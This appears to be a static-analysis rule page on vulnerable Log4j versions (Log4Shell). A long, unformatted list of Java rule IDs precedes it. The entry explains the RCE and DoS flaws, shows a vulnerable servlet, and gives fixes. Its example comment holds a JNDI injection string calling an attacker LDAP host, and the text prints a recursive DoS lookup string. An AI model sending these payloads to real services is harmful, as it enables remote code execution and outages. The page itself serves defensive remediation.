Audit: Biometric authentication should always be used with a cryptographic objectJAVA-A1030Audit: XMLReader may be vulnerable to XXE attacksJAVA-A1060Non-constant string passed to `execute` or `addBatch` method on an SQL statementJAVA-S0082Audit: `DocumentBuilder` may be vulnerable to XXE attacksJAVA-A1052Prepared statements must not be generated from dynamically created stringsJAVA-S0083Spring password storage must use a strong hashing functionJAVA-S1018`equals` method does not handle null valued operandsJAVA-S0110Reference to mutable object which is returned may expose internal representation of dataJAVA-S0132Nullable parameters should be checked for null before useJAVA-E1067Reference to externally mutable object stored as internal stateJAVA-S0133Servlets should not use mutable fields without synchronizationJAVA-E0128Audit: Broadcasting intents without specifying a target package or receiver permission may be a security riskJAVA-A1023Prepared statements must not be generated from dynamically created stringsJAVA-S1016XMLStreamReaders must be secureJAVA-S1009`equals` method does not handle null valued operandsJAVA-E0110`StringBuffer`/`StringBuilder` constructors should not be passed characters as the first argumentJAVA-E1023Cipher does not support integrity verificationJAVA-S1005XSSRequestWrapper must not be usedJAVA-S1007Custom hashing algorithms must not be usedJAVA-S1008NullCipher must not be used outside of testsJAVA-S1010Sockets must be secureJAVA-S1011A TrustManager/HostnameVerifier that accepts all certificates is a security riskJAVA-S1002Disabling escaping of special characters in templates is a security riskJAVA-S1025LDAP object deserialization is a security riskJAVA-S1026Audit: log4j version used could lead to remote code executionJAVA-A1022Loops must terminate by some meansJAVA-S0024LDAP connections should be authenticatedJAVA-S1020SSLContext instances should not be constructed using "SSL"JAVA-A1059Audit: Thread.sleep() call may be at risk of DoS attackJAVA-A1056Spring sessions must not be retained across user loginsJAVA-S1017Audit: MongoDB queries using operators like `$where` may be a security riskJAVA-A1054Possible null accessJAVA-E1083Possible null access due to exception handlingJAVA-E1084Arguments to `Collections.nCopies()` should be in the correct orderJAVA-E1090Unsynchronized lazy initialization of static value detectedJAVA-E1053Avoid throwing `null`JAVA-E1097Methods annotated as non-nullable should not return null valuesJAVA-E1095`Hashtable/ConcurrentHashMap.contains()` checks for whether a value exists, not keysJAVA-E1098Insecure RandomUtil implementations must not be usedJAVA-S1036Spring component introduces unmanaged stateJAVA-S1060Request handler method accepts persistent object as argumentJAVA-S1061SAML comment parsing should be disabledJAVA-S1062`getRequestSessionId` should not be usedJAVA-S1063Audit: User input should not directly be used in network callsJAVA-A1034Audit: Web views should not have access to filesJAVA-A1028Audit: Enabling JavaScript within a web view is a security riskJAVA-A1029Audit: File can be modified or read by any userJAVA-A1038Audit: Hibernate query may be vulnerable to injection attacksJAVA-A1040Audit: Prepared query may be susceptible to injection attacksJAVA-A1041Audit: SQL query may be susceptible to injection attacksJAVA-A1042Audit: `Runtime.exec()` call may be susceptible to injection attacksJAVA-A1057Audit: Amazon SimpleDB queries should not be susceptible to injection attacksJAVA-A1058Audit: File is set as world readable or writableJAVA-A1039Local variable is never written toJAVA-E1064Non-final static fields should not be publicJAVA-S1050Loops must terminate by some meansJAVA-E1046Thread instances should not be used to call static methods of ThreadJAVA-E1062Private field is never initializedJAVA-E1065NullPointerException should not be caughtJAVA-E1070removeAll should not be used to clear a collectionJAVA-P1005`@RequestMapping` must restrict the allowed HTTP methodsJAVA-S1065SecureRandom seeds must not be predictableJAVA-S1031SMTP configurations should check SSL certificates for authenticityJAVA-S1033Paths in chained `antMatchers` invocations are not ordered by specificityJAVA-S1064Persistent objects should not be returned from methodsJAVA-S1066Audit: Setting bean properties with unsanitized input may be a security riskJAVA-A1027Audit: Including request data within HTML response strings may lead to XSS attacksJAVA-A1035JWTs should be checked for authenticity and integrityJAVA-S1048Avoid catching assertions in testsJAVA-W1076Invalid values for `java.time` constants will always throw a `DateTimeException`JAVA-E1099Injected fields should not be assigned in injection constructorsJAVA-W1079Incorrect main method signature detectedJAVA-E1105Deprecated `HttpClient` implementations should not be usedJAVA-S1067Iterator `next` method must throw `NoSuchElementException`JAVA-S0146`synchronized` block is emptyJAVA-W0151For loop appears to check one variable and increment anotherJAVA-S0214Boolean expression LHS/RHS with bitwise OR will never be equal to a constant RHS/LHSJAVA-E1073Random instances should be reusedJAVA-W1015Do not synchronize on the result of `getClass()`JAVA-E1021For loop appears to check one variable and increment anotherJAVA-E0214Using week year (YYYY) in place of year (yyyy) may produce incorrect resultsJAVA-E1006`@SpringBootApplication`/`@ComponentScan` annotations must not be used in the default packageJAVA-E1009Consumed streams must not be reusedJAVA-E1019Unsupported JDK-internal APIs should not be usedJAVA-E1030Inefficient use of `toArray` with non-zero sized array argumentJAVA-P0335Iterator `next` method should throw `NoSuchElementException`JAVA-W0146Map compute methods cannot be used to create null valued entriesJAVA-W1011Audit: Unsafe Jackson deserialization configurations should not be usedJAVA-A1024Audit: Double checked locking is not safeJAVA-E1018Static methods should be accessed using the class instanceJAVA-W1029Static fields of the parent class should not be accessed through child class instancesJAVA-W1030`equals()` method parameters should not be marked with `@NotNull` or equivalent annotationsJAVA-W1028Basic authorization is a security riskJAVA-S1019Sealed class/interface permitted types need not be listed if they are declared in the same fileJAVA-W1031Boxed Boolean values should not be used in conditional expressionsJAVA-E1054@NoAllocation annotated methods should not create new objectsJAVA-E1059Conditions should not contain assignmentsJAVA-W1034`ZoneId.of()` should be passed a valid timezone identifierJAVA-E1092Iterators should not be invalidated while in scopeJAVA-E1085`@Inject` detected on a final fieldJAVA-W1071Detected use of the `Date` APIJAVA-W1072`Instant` should not be passed unsupported temporal unit typesJAVA-E1094Multiple `@Inject` constructors foundJAVA-W1074Mutable data passed in to nonpublic field may be externally modifiableJAVA-E1086`Class.isInstance()` should not be called on a `Class` objectJAVA-E1091Synchronizing on a mutable reference may lead to unexpected behaviorJAVA-E1051Public fields should not be synchronized onJAVA-E1061`readResolve` must return `Object`JAVA-E1032Unused private field detectedJAVA-W1025Detected synchronization on string literalJAVA-E1081Method can be declared staticJAVA-W1057`TimeZone.getTimeZone` should be passed correct timezone IDsJAVA-E1093`Iterable<Path>` is errorprone and should be replaced with `Collection<Path>`JAVA-E1096Use of `@Nonnull`, `@CheckForNull`, or `@Nullable` detected on primitive declarationJAVA-W1063Do not call hashCode directly on an array classJAVA-E1044String.indexOf's arguments should not be reversedJAVA-E1089Abstract or default method annotated with `@Inject`JAVA-W1075`serialVersionUID` should be correctly declaredJAVA-E1042Double assignment of variable detectedJAVA-E1063Constructor must not be marked with nullable annotationsJAVA-W1070Switch case without appropriate control flow breakJAVA-A1068Redundant boolean literalJAVA-W1064`ZoneId.of("Z")` should be replaced with `ZoneOffset.UTC`JAVA-W1085Multiple variables declared on the same lineJAVA-C1003Loop conditions should be true at least onceJAVA-E1045Redundant type checkJAVA-W1021Type names must begin with an uppercase letterJAVA-C1001Wrong argument order in test assertionsJAVA-C1002`Double`/`Float` comparison with `NaN` will always return `false`JAVA-E1031Custom serialization method is declared with an incorrect signatureJAVA-E1033Serializable class with non-serializable superclass and no default constructor detectedJAVA-E1034Wrong argument type for Collection remove methodJAVA-E1036Collection type is unsafely downcast to a concrete classJAVA-E1037Annotation check will always return falseJAVA-E1039Interface is unimplementableJAVA-E1041Enum fields should not be mutableJAVA-E1069The `%` operator has higher precedence than the `*` operatorJAVA-E1080Missing enum elements in switch casesJAVA-E1082Inefficient `OutputStream` implementationJAVA-P1002Mutable fields should not directly be returnedJAVA-S1049Type parameter shadows another typeJAVA-W1017Variable is checked for `null` twiceJAVA-W1068Zip entries should not be emptyJAVA-W1023`toString()` may not work as expected for array typesJAVA-W1027Classes that contain only static members should not be instantiatedJAVA-W1035Local variables should not be assigned in return statementsJAVA-W1037Anonymous classes should not contain unused non-overridden methodsJAVA-W1039Overly generic exceptions should not be thrownJAVA-W1042`instanceof` check with a known null value will always return falseJAVA-W1044Interface only declares static final fieldsJAVA-W1059Static field accessed before being writtenJAVA-W1060`@Expensive`/`@WorkerThread` annotated method should not override unannotated super methodJAVA-W1061Wrong thread for swing method invocationJAVA-W1062Concrete collection type used in method declarationJAVA-W1065Method returning collection/array type returns `null` insteadJAVA-W1066Redundant cast of return valueJAVA-W1067Primitive values don't need to be compared with `Object.equals()`JAVA-W1080Inject annotations on abstract class constructors have no effectJAVA-W1084Methods should not have different nullability than their super methodsJAVA-E1100Returned `Future`s should not be ignoredJAVA-W1087Unnecessary imports detectedJAVA-W1069Use `assertNull`/`NotNull` instead of `assertEquals`/`notEquals` to assert nullityJAVA-W1091`@Deprecated` should not be applied to local variables or parametersJAVA-W1082`readResolve` should be protected for non-final classesJAVA-W1097Use `existsById` instead of `findById` to check for the existence of an entityJAVA-W1090`switch` statements with only 2 branches should be `if` statements insteadJAVA-W1086@VisibleForTesting/@TestOnly annotated methods/constructors should not be used in non-test codeJAVA-A1067`getClass` should not be used with enums whose members have custom bodiesJAVA-E1106Avoid using deprecated `Thread` methodsJAVA-E1107`String.substring()` call with single `0` index foundJAVA-W1077Avoid using a single unescaped `.` as a regex patternJAVA-W1078Synchronization performed on a concurrency primitive objectJAVA-E0321Abstract class constructors should not be publicJAVA-W1094Closeable values should not be injected via `@Provides` annotated methodsJAVA-E1103CacheLoader implementation `load` method should not return `null`JAVA-E1104`BigDecimal.equals()` may produce unintended resultsJAVA-W1083Catch blocks should be reachableJAVA-W1092Avoid assertions within `Runnable`sJAVA-W1096Calls to assertion chain methods should be terminated with an assertionJAVA-E1109`readObject` should not be synchronizedJAVA-W1093Avoid using `ThreadGroup` methodsJAVA-E1108Absolute paths should not be hard codedJAVA-W0406JUnit5 test classes and methods should be package-privateJAVA-W1058Method superfluously delegates to parent class methodJAVA-W1016Type bound extends final typeJAVA-W1018For loop can be converted into a foreach loopJAVA-W1089Test files should contain testsJAVA-W1088Attempt to close a null value detectedJAVA-S0250Value is always nullJAVA-S0249Maps and Sets of URLs can be performance hogsJAVA-S0057Impossible downcast of `toArray()` result detectedJAVA-S0386`IllegalMonitorStateException`s should not be handledJAVA-S0040Database resource may not be closed on returnJAVA-S0326Possible database resource leak detectedJAVA-S0327`readLine()` result is read without a null checkJAVA-S0220Possibly null fields should not be synchronized onJAVA-E1060Incorrect combination of `Math.max` and `Math.min`JAVA-S0080Stream does not appear to be closed after useJAVA-S0268Clone method does not invoke super methodJAVA-S0048Static initializer creates instance before all static final fields are assignedJAVA-S0267Value is guaranteed to be accessed while null after an exception is thrownJAVA-S0266Stream may be left unclosedJAVA-S0269No relationship between the generic parameter of the called method and its argumentJAVA-S0421Sequence of operations on a concurrent abstraction may not be atomicJAVA-S0447`System.runFinalizersOnExit`/`Runtime.runFinalizersOnExit` are unsafe and must not be usedJAVA-E0061Class extends Servlet class and uses instance variablesJAVA-S0370Synchronization performed on a util.concurrent `Lock` objectJAVA-S0321Overwriting a method parameter will not modify the original objectJAVA-S0352Waiting with two locks held is likely to cause a deadlockJAVA-E0139`wait`/`notify` called without synchronization on an objectJAVA-E0288Cookies must not be insecureJAVA-S1003Avoid using `equals` to compare against `null`JAVA-E0051Incorrect combination of `Math.max` and `Math.min`JAVA-E0080`IllegalMonitorStateException`s should not be handledJAVA-E0040Self assignment of local variable detectedJAVA-E0291Clone method does not invoke super methodJAVA-E0048Finalizers must not be explicitly invokedJAVA-E0094`readLine` result is read without a null checkJAVA-E0220Method attempts to access a result set field with index 0JAVA-E0343Method attempts to set a prepared statement parameter with index 0JAVA-E0344Impossible downcast of `toArray` result detectedJAVA-E0386Invalid regex syntax must not be usedJAVA-E0394Iterator `hasNext` should not invoke `next`JAVA-E0409A syntax error was foundJAVA-E1000Bad short-circuiting null checkJAVA-E1003Methods must not unconditionally call themselvesJAVA-E1017Indices must not be out of boundsJAVA-E1020`Optional` values must never be `null`JAVA-E1022Whitespace characters must always be escapedJAVA-E1029Maps and Sets of URLs can be performance hogsJAVA-P0057`Pattern.compile()` should not be called in a loopJAVA-P0331Overly permissive CORS policies are a security riskJAVA-S1000Servlet does not sanitize path names from HTTP requestsJAVA-S1001CBC and ECB modes are insecureJAVA-S1004Insecure encryption algorithm detectedJAVA-S1012RSA without padding is insecureJAVA-S1013RSA keys must be at least 2048 bits longJAVA-S1014Blowfish keys must be at least 128 bits longJAVA-S1015Finalizer method should be protected, not public or privateJAVA-W0089Insecure hash algorithm usage with passwords detectedJAVA-S1006Database password field is emptyJAVA-S0014Method with `Optional` return type must not return `null`JAVA-S0031Method does not check if an argument is nullJAVA-S0109Prepared statements should not be created within a loopJAVA-S0329Local variable that shadows field is written to but not read fromJAVA-S0353Class extends Servlet class and uses instance variablesJAVA-E0370Switch blocks must not contain statement labelsJAVA-E1005Insecure network protocols must not be usedJAVA-S1021Nullable value stored to non-null fieldJAVA-E1071Collections should not contain themselvesJAVA-E1076Prepared statements should not be created within a loopJAVA-P1003Storing an externally mutable value into a private static field may expose internal stateJAVA-S0134Public static method returns freely modifiable array that may expose internal stateJAVA-S0131`BigDecimal` constructed from `double` may be impreciseJAVA-S0008Inefficient use of keySet iterator instead of entrySet iteratorJAVA-S0361`System.exit()` should only be invoked within application entry pointsJAVA-S0060`Thread` passed where `Runnable` expectedJAVA-S0056`toString` invoked on a string value is uselessJAVA-S0064`Boolean` constructor is inefficient, consider using `Boolean.valueOf` insteadJAVA-S0066`Integer`/`Long` constructor is inefficient, use `valueOf` insteadJAVA-S0067`Float`/`Double` constructor is inefficient, use `valueOf` insteadJAVA-S0068Use `""` instead of `new String()` to create empty stringsJAVA-S0063Inefficient use of `String` constructorJAVA-S0062Increment of volatile field is not atomicJAVA-S0028Adding elements of an entry set may fail due to reuse of `Entry` objectsJS0425Explicit invocation of garbage collection is detrimental apart from some benchmarking use casesJAVA-S0065Repeated conditional test on the same variable detectedJAVA-S0034Elements accessed from volatile reference to an array are not volatileJAVA-S0027Method may ignore exceptionsJAVA-S0052Invocation of `equals()` on an array, which is equivalent to `==`JAVA-S0348Use of member identifier that is a keyword in later Java versionsJAVA-S0050Fields of immutable classes should be finalJAVA-E0055Collections should not be added to themselvesJAVA-E1077Array elements should match the runtime type of the arrayJAVA-E1079String concatenation using `+` within loops is costly and should be replaced by a `StringBuffer`/`StringBuilder`JAVA-P1006Imprecise redefinition of library constantJAVA-W1033Empty catch clauses may hide exceptionsJAVA-E0052Boxed primitives should not be synchronized onJAVA-E0150`Thread.sleep()` should not be called while a lock is heldJAVA-E0410Invoking a `Runnable` object's `run` method will perform the task in the current thread, not a new oneJAVA-E0135Elements accessed from volatile reference to an array are not volatileJAVA-E0027Invocation of `equals` on an array, which is equivalent to `==`JAVA-E0348Use of identifier that is a keyword in later Java versionsJAVA-W0050Finalizers are deprecated since Java 9JAVA-W0088`equals` always returns `false`JAVA-W0107Unsafe usage of `getResource`JAVA-E0029Monitor `wait` must not be used on a `Condition`JAVA-E0078`equals` always returns `true`JAVA-W0106C style array declaration syntax must not be usedJAVA-C1000Increment of volatile field is not atomicJAVA-E0028Arguments of binary expressions must not be duplicatedJAVA-E0034`Thread` passed where `Runnable` expectedJAVA-E0056Use `""` instead of `new String()` to create empty stringsJAVA-P0063`equals` method defined for enumerationJAVA-E0096`equals` method is overloaded but not overriddenJAVA-E0098`equals` method inherits parent class implementation instead of overriding `Object.equals`JAVA-E0099`compareTo`/`compare` returns `Integer.MIN_VALUE`JAVA-E0112Classes should not have the same name as any of their superclasses or implemented interfacesJAVA-E0169Return value of `InputStream.read()` should not be ignoredJAVA-E0183Return value of `InputStream.skip` should not be ignoredJAVA-E0184Constructor of non-final class starts a threadJAVA-E0208Increment/decrement performed during assignment expression to same variable will be lostJAVA-E0396Shift amounts outside the valid range may produce unexpected resultsJAVA-E0399Oddness check using `x % 2 == 1` will not work for negative numbersJAVA-E0405Arguments to String.format must match the provided format stringJAVA-E1001`toString` invoked on a string value is uselessJAVA-P0064Jump statements must not be used within `finally` blocksJAVA-E1007Case insensitive regex does not properly handle Unicode inputJAVA-E1010Objects should not be compared to themselves within assertionsJAVA-E1012Optional values must be checked before being accessedJAVA-E1013`Iterable` objects must not return `this` in `iterator()` methodJAVA-E1015`setUp` and `tearDown` methods must be properly annotatedJAVA-E1028Inefficient use of `String` constructorJAVA-P0062Explicit invocation of garbage collection is detrimental apart from some benchmarking use casesJAVA-P0065`Boolean` constructor is inefficient, consider using `Boolean.valueOf` insteadJAVA-P0066`Integer`/`Long` constructor is inefficient, use `valueOf` insteadJAVA-P0067`Float`/`Double` constructor is inefficient, use `valueOf` insteadJAVA-P0068Non-null boxed types are inefficientJAVA-P1000Use `String.replace()` instead of `String.replaceAll()` for simple text patternsJAVA-P1001`Thread` with empty `run` method is uselessJAVA-W0084`BigDecimal` constructed from `double` may be impreciseJAVA-W0008Maximum pool size of `ScheduledThreadPoolExecutor` cannot be changedJAVA-W0012Empty catch clauses may hide exceptionsJAVA-W0052`System.exit()` should only be invoked within application entry pointsJAVA-W0060`equals` checks for incompatible operandJAVA-W0095Class doesn't override `equals` from superclassJAVA-W0100Invoking a `Runnable` object's `run` method will perform the task in the current thread, not a new oneJAVA-W0135Possibly useful method return value is ignoredJAVA-W0243References should not be compared with `==`/`!=`JAVA-W0280File path does not match declared packageJAVA-W1001Exceptions must not be thrown in finalizersJAVA-W1002Collection and array length checks must be sensibleJAVA-W1005Fields must not shadow other fields with the same name from super classesJAVA-W1007JUnit test class overrides `setUp` but does not invoke `super.setUp()`JAVA-S0337`@OverridingMethodsMustInvokeSuper` annotation in super method is ignored by overriding methodJAVA-S0001A call has been made to an unsupported methodJAVA-S0013`Boolean` method may return `null`JAVA-S0030Empty zip file entries should not be createdJAVA-S0038Empty jar file entries should not be createdJAVA-S0039Class implements `Cloneable` but has not overridden the `clone` methodJAVA-S0046Class defines `clone` but does not inherit from `Cloneable`JAVA-S0047Synchronizing on a mutable reference may lead to unexpected behaviorJAVA-S0153Synchronization on a nonfinal field is dangerous and error-proneJAVA-S0154Value assigned is overwritten due to switch fall throughJAVA-S0197`Random` object is used only once, then discardedJAVA-S0301Assertion possibly occurs in a non-test threadJAVA-S0336JUnit test class overrides `tearDown` but does not invoke `super.tearDown()`JAVA-S0338Arrays are not equal to non-array valuesJAVA-S0347`equals` can't be used to compare arrays of different typesJAVA-S0349Wait/notify must not be called on a Thread objectJAVA-E1004Overwriting a method parameter will not modify the original objectJAVA-E0352Inefficient use of keySet iterator instead of entrySet iteratorJAVA-P0361Malformed JavaDoc commentJAVA-D1007`Duration.withNanos()` may not produce correct resultsJAVA-E1087Parameter tag has no descriptionJAVA-D1005JavaDoc tags should not be emptyJAVA-D1006Unmatched Parameter tag foundJAVA-D1004Getter and setter method synchronization does not matchJAVA-E1074Thread.currentThread() should not be used to call Thread's static methodsJAVA-W1038Non-thread-safe date/time fields should not be public and staticJAVA-E1024Call to unsupported method detectedJAVA-E1048Private fields which are only set to null should be removedJAVA-E1066Random value in range 0 to 1 is coerced to integer 0JAVA-E1068Calling String.indexOf() with a single character string is inefficientJAVA-P1004Expensive methods should not be invoked from performance critical threadsJAVA-P1007Object should not be passed where a generic type is expectedJAVA-W1036Bitwise operations should not be checked for signJAVA-W1043Negating the result of `compareTo`/`compare` may have unexpected resultsJAVA-W1048Boxed primitives will be unboxed and coerced to a common type in ternary operationJAVA-W1055Class overrides `compareTo()` but not `equals()`JAVA-W1056Downcast may flip integer sign in comparator methodJAVA-E1102Primitive value is boxed, then unboxed to perform primitive coercionJAVA-W1081Class overrides `TestCase` but has no test methodsJAVA-S0341Primitives do not need to be boxed for comparisonJAVA-W1050Object appears to have been created for no reasonJAVA-S0235Class is not an Exception/Throwable, even though it is named as suchJAVA-S0182Private method is never calledJAVA-S0324`Object.getClass` does not need to be invoked on an instantiated objectJAVA-W0077Method uses the same code for two switch clausesJAVA-S0412Useless control flow detectedJAVA-W1047Useless unboxing of a valueJAVA-W1052Protected fields in a final class are uselessJAVA-W0417Format strings should use `%n` instead of `\\n`JAVA-W0379The default case should be last within a switch blockJAVA-W1010Private method is never calledJAVA-W0324Method uses the same code for multiple branchesJAVA-W0411Getter/setter names must be appropriateJAVA-E1014Class overrides `hashCode` but not `equals`JAVA-W0117Finalizer nulls fieldsJAVA-W0087Empty finalizer methods should be deletedJAVA-W0090Class is not an Exception/Throwable, even though it is named as suchJAVA-W0182Method uses the same code for two switch clausesJAVA-W0412Exception classes must be named appropriatelyJAVA-W1000Methods must not be emptyJAVA-W1004Method and field names must be dissimilarJAVA-W1006Hashcode must be implemented along with EqualsJAVA-W0116Float precision math may be impreciseJAVA-S0041Class is Serializable, but doesn't define `serialVersionUID`JAVA-S0193Case conversion may not work as expected for international characters without specifying the encodingJAVA-S0069Serializable class with non-serializable super class having no void constructor detectedJAVA-S0192Useless increment in return statementJAVA-S0356Float comparison with `NaN` will always failJAVA-S0364Method superfluously delegates to parent class methodJAVA-S0415Floating point values should not be compared with relational operators in comparison methodsJAVA-W1032Undocumented class foundJAVA-D1000Undocumented constructor foundJAVA-D1002Undocumented declaration foundJAVA-D1003Non-static nested class foundJAVA-W1019Local variable is assigned null value and not read afterJAVA-W1040Needless boxing of a primitive only to call `toString`JAVA-W1049Boxing a value is redundant if it is immediately unboxedJAVA-W1051Undocumented method foundJAVA-D1001Function with cyclomatic complexity higher than threshold foundJAVA-R1000
Java logoJava/
JAVA-A1022

Audit: log4j version used could lead to remote code executionJAVA-A1022

Critical severityCritical
Security categorySecurity
a05, a06, cwe-502, security, sans-top-25, owasp-top-10

The log4j library is a popular logging library used across the JVM ecosystem. However, if you are using a vulnerable version of Log4j (A version between 2.0 and 2.17.0), RCE (Remote Code Execution) as well as DoS (Denial of Service) attacks are possible through abuse of Log4j's template processing algorithm.

An attacker can perform a malicious JNDI object lookup to chain other exploits, or induce the application to process a malicious template string resulting in a DoS attack if your code logs request data (such as a user agent header).

Update your Log4j version to 2.17.1 to mitigate these vulnerabilities.

The following vulnerabilities have been discovered as of December 19, 2021:

  • The original RCE vulnerability, affecting Log4j versions 2.0 and fixed incompletely in 2.15.0.
  • A DoS vulnerability, surfaced in version 2.15.0 and affecting all 2.x versions before it. This vulnerability is possible with certain non-default pattern layouts that allow the attacker to initiate JNDI lookups by manipulating thread context data. This attack requires a custom pattern layout that uses an interpolation string like $${ctx:loginId}.
    It has been fixed in version 2.16.0; message lookup and JNDI functionality is disabled by default now.
  • Log4j 1.x is partially vulnerable with non-default configurations that use the JMSAppender class. While this is of a lower severity than the other vulnerabilities found so far, version 1.x has been deprecated since 2015 and will not receive official updates (not even security fixes); consider updating to the latest 2.x version.
  • Another severe DoS vulnerability, affecting versions 2.0 to 2.16.0. It is possible for a specially crafted self-referential lookup string (PoC example of this is ${${::-${::-$${::-j}}}}) to cause log4j to go into an infinite recursive loop, resulting in a stack overflow. NOTE: This vulnerability also requires a non-default pattern layout similar to the previously mentioned DoS attack.
    This is fixed in version 2.17.1.

Update your Log4j version to the latest to avoid these vulnerabilities.

Bad Practice

Here is an example of this issue using a servlet:

@WebServlet(value="/some/path", name="vulnerableServlet")
public class VulnerableServlet extends HttpServlet {

    private static final Logger logger = LogManager.getLogger(VulnerableServlet.class.getName());

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException {
        String userAgent = req.getHeader("user-agent");

        // will trigger an RCE exploit if the user agent contains a JNDI scheme url.
        // Here, the target is a malicious LDAP server.
        // For example: ${jndi:ldap://attacker.com/a}
        logger.info("Request user agent is " + userAgent);
    }
}

This exploit can make use of multiple RPC protocols, including LDAP, CORBA and RMI, of which LDAP is especially vulnerable due to its lack of security manager enforcement.

For an in-depth explanation of how this attack is made possible, read this article.

On Java versions above 6u211, 7u201, 8u191 and 11.0.1 this vulnerability is mitigated to some extent because LDAP object instantiation is disabled through properties such as com.sun.jndi.ldap.object.trustURLCodebase, preventing JNDI from blindly downloading and instantiating classes from remote code (source). This should not be relied on, as these properties could be changed to allow the exploit again.

There are a few ways to fix this issue.

  • Upgrade to Log4j 2.17.1

Log4j's latest version, 2.17.1 fixes this bug.

Upgrade your Log4j dependency to this version if possible.

  • Remove the JndiLookup class from your application's classpath

This vulnerability exploits Log4j's ability to interpolate JNDI lookup urls into logged strings. It is safe to do so but will not protect from certain DoS vulnerabilities mentioned above.

JndiLookup.class can be removed by deleting the JndiLookup.class file from your copy of log4j-core.jar:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
  • Use thread lookup format specifiers such as %X or %MDC instead of context lookup strings like $${ctx:someKey}

The use of lookup strings in custom pattern layouts may leave you open to DoS attacks. Use thread context map patterns (%X, %MDC or %mdc) to print out thread context data instead.

Note that this may need to be applied for every release of your application if you make use of fat jars in your deployment.

The best method to prevent this issue is to update to the latest version of Log4j.

References